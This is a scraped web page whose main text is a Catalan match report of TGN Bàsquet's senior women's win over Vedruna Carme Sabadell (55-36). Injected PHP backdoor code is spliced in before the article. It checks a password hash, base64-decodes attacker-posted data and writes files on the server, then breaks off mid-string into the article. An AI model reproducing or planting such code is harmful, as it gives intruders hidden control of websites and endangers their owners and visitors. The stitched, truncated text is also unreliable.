function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior femení se sobreposa a la falta de punteria a còpia de defensa i derrota el Vedruna Carme Sabadell (55-36) - Tgn Bàsquet Club -

El sènior femení se sobreposa a la falta de punteria a còpia de defensa i derrota el Vedruna Carme Sabadell (55-36)

Updated: octubre 13, 2019

L’equip sènior del TGN Bàsquet no va tenir massa problemes per desfer-se del seu tercer rival aquest curs, el Vedruna Carme Sabadell, que, com els altres dos rivals anteriors (CN Sabadell i Manyanet Reus) va acabar igual: derrotat. L’equip que entrena Víctor Neila no va fer un gran partit, especialment en la primera meitat, però va demostrar caràcter, capacitat de treball i decisió en un dia on no va registrar els seus millors percentatges de tir però on va defensar i córrer de valent.

Les visitants, que arribaven al Sagrat Cor amb un sol partit disputat que va acabar amb derrota contundent (84-43 a la pista del CB Balaguer), van posar les coses difícils a les tarragonines a l’inici del partit. Un triple només començar va advertir les liles que el Vedruna Carme Sabadell no havia vingut a passejar-se. El primer quart va ser, però, un despropòsit. Les errades en ambdós equips van sovintejar, especialment en el tir. Al minut 7, el marcador mostrava un empat a 5-5 que evidenciava què estava passant a la pista.

El TGN Bàsquet no trobava el seu ritme de joc, amb molt poca clarividència ofensiva —moltes pèrdues en passades aparentment senzilles— i pèssim en el tir. En aquest panorama, les visitants van arribar al final del període amb quatre punts d’avantatge (6-10).

En el segon quart les coses van començar a canviar. El TGN Bàsquet mostrava un augment en la seva activitat defensiva i en atac estàtic també. La bona defensa de les locals va permetre recuperar moltes pilotes i els contraatacs van sovintejar. Així, marcaven un parcial de 10-2 que capgirava el resultat (16-12). Amb l’alleugeriment de veure que l’electrònic li era favorable, el tir exterior, que havia estat un malson per a les locals, va començar a funcionar i Sofía Llanos amb dos triples seguits permetia que el TGN Bàsquet obrís una escletxa significativa (22-14 a 2:43 pel descans).

Víctor Neila no va poder comptar amb la júnior Mariona Rovira pel partit i en el seu lloc va convocar la també júnior Judit Garcia, que debutava aquesta temporada amb l’equip sènior —ja havia jugat alguns instants la temporada passada quan l’equip militava a Copa Catalunya—. Amb Garcia, ja són tres les jugadores júniors que han debutat amb el primer equip del TGN Bàsquet quan només s’han disputat tres jornades: Rovira, Malpartida i Garcia.

El Vedruna Carme Sabadell no es va rendir i va presentar batalla en el tram final del segon període  (22-18), però una reacció de les tarragonines amb un triple de Laura Vilamajor inclòs sobre la botzina que indicava el final del segon quart va permetre arribar al descans amb un resultat tranquil·litzador: 29-18.

Com en el primer quart, les visitants van sortir millor que les locals i van marcar un parcial de 0-4 que, però, va ser contrarestat per les liles amb un 6-0. El concurs de les tres interiors tarragonines (Fort, Vadillo i López) va ser cabdal perquè van aportar solidesa al joc i, sobretot equilibri. A la feina fosca que acostumen a fer les tres, cal afegir-hi el seu protagonisme ofensiu (28 punts entres les tres), destacant Laia López, amb un triple anotat. Durant tot el partit va ser Laura Pascual qui va tenir les idees més clares, aportant verticalitat i decisió a l’equip en un matx on durant molts moments van faltar idees, especialment a l’inici com s’ha comentat anteriorment.

Quan faltaven 10 minuts el resultat era prou clar però no definitiu (44-26). Amb tot, semblava que el Vedruna Carme Sabadell no tindria prou armes per a sorprendre a les locals, com així va ser. Amb la defensa i poc més —es va arribar a un màxim avantatge de 22 punts, 48-26 a 7 minuts del final—, el TGN Bàsquet va certificar una nova victòria que el manté invicte després de tres jornades.